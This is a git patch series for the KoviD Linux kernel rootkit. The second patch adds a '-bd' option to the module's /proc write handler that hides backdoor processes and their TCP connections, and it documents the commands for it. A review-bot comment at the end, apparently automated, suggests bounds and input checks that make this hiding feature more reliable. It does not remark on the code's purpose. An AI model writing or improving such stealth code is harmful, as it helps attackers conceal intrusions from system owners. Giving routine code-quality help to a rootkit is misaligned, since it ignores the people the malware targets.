From eba03db8bab6e98025756a44a3c6e0bebf4a6632 Mon Sep 17 00:00:00 2001 From: chash Date: Mon, 29 Apr 2024 20:27:31 +0100 Subject: [PATCH 1/2] changed misleading title --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 4322459..2579ac2 100644 --- a/README.md +++ b/README.md @@ -28,7 +28,7 @@ Watch [KoviD Demos](https://github.com/carloslack/kv-demos/tree/master) -### 1.1 Compatible systems +### 1.1 Mostly tested against CentOS Linux release 8.3.2011 4.18.0-240.22.1.el8_3.x86_64 #1 SMP Thu Apr 8 19:01:30 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux From f0cee52d86e790c792988f91d43945d65fc3678e Mon Sep 17 00:00:00 2001 From: JNE Date: Tue, 7 May 2024 08:30:38 -0700 Subject: [PATCH 2/2] Add "-bd" option for hiding backdoor tools Hiding with "-bd" will also hide tcp connections from/to that process. Example: Hiding: $ echo "-bd 1234" >/proc/mytest Unhiding: $ echo "1234" >/proc/mytest --- README.md | 4 ++++ src/kovid.c | 12 +++++++++++- 2 files changed, 15 insertions(+), 1 deletion(-) diff --git a/README.md b/README.md index 2579ac2..c10cbe1 100644 --- a/README.md +++ b/README.md @@ -152,6 +152,10 @@ Watch [KoviD Demos](https://github.com/carloslack/kv-demos/tree/master) You can hide/unhide processes using the /proc/mytest interface. For example, to hide a task, run: $ echo 14886 >/proc/mytest. + If a task is a backdoor that needs tcp hiding, run: + $ echo "-bd " >/proc/mytest. + Unhiding is the same as for regular tasks: + $ echo "" >/proc/mytest ### 3.3 Hide module diff --git a/src/kovid.c b/src/kovid.c index 71bee86..ab8c915 100644 --- a/src/kovid.c +++ b/src/kovid.c 
@@ -465,8 +465,18 @@ static ssize_t write_cb(struct file *fptr, const char __user *user,
 buf[strcspn(buf, "\r\n")] = 0;
+ /* Hide PID as backdoor */
+ if(!strncmp(buf, "-bd", MIN(3, size))) {
+ char *tmp = &buf[4];
+ int val = 0;
+ tmp[strcspn(tmp, " ")] = 0;
+ if (kstrtoint(tmp, 10, &val)) {
+ prerr("Failed kstrtoint\n");
+ } else {
+ kv_hide_task_by_pid(val, 1, CHILDREN);
+ }
 /* hide kovid module */
- if(!strcmp(buf, "-h") && !op_lock) {
+ } else if(!strcmp(buf, "-h") && !op_lock) {
 static unsigned int msg_lock = 0;
 if(!msg_lock) {
 msg_lock = 1;
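Review bot: The `-bd` branch dereferences `&buf[4]` without checking that the input is that long: `strncmp(buf, "-bd", MIN(3, size))` accepts a bare "-bd" (and, for a 1- or 2-byte write, any string starting with "-"), after which `tmp` points past the NUL terminator and `strcspn`/`kstrtoint` read whatever follows it in `buf` — whether that is stale data or out of bounds depends on how `buf` is declared, which is outside the hunk. Matching the full prefix including the separator removes the `size` arithmetic and guarantees `buf[4]` lies inside the string (at worst on the terminator, where `kstrtoint` fails cleanly): `if(!strncmp(buf, "-bd ", 4)) {`. `kstrtoint` also accepts zero and negative values, which then reach `kv_hide_task_by_pid`; unless that helper rejects them itself, `if (kstrtoint(tmp, 10, &val) || val <= 0) {` is the cheaper place to stop them. The "also hides tcp connections" behaviour from the commit message is not visible here beyond the `1` passed as the second argument, so a short comment naming that flag (e.g. `/* 1: also hide the task's tcp connections */`) would help the next reader. write_cb starts and ends outside the hunk.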